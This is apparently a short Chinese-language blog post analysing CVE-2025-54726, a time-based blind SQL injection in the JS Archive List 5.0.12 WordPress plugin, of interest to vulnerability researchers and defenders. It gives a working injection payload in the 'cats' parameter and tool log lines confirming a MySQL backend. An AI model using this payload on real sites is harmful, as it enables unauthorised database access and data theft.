CVE-2025-54726时间盲注漏洞利用分析

本文详细分析了CVE-2025-54726漏洞在JS Archive List 5.0.12版本中的时间盲注利用方式,包含具体的Payload构造和数据库类型确认过程,涉及MySQL数据库的盲注技术实现。

CVE-2025-54726

JS Archive List 5.0.12 时间盲注漏洞(IF条件注释) 攻击载荷:cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude


[16:39:05] [INFO] 正在测试MySQL [16:39:05] [INFO] 确认MySQL [16:39:06] [INFO] 后端数据库管理系统为MySQL

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计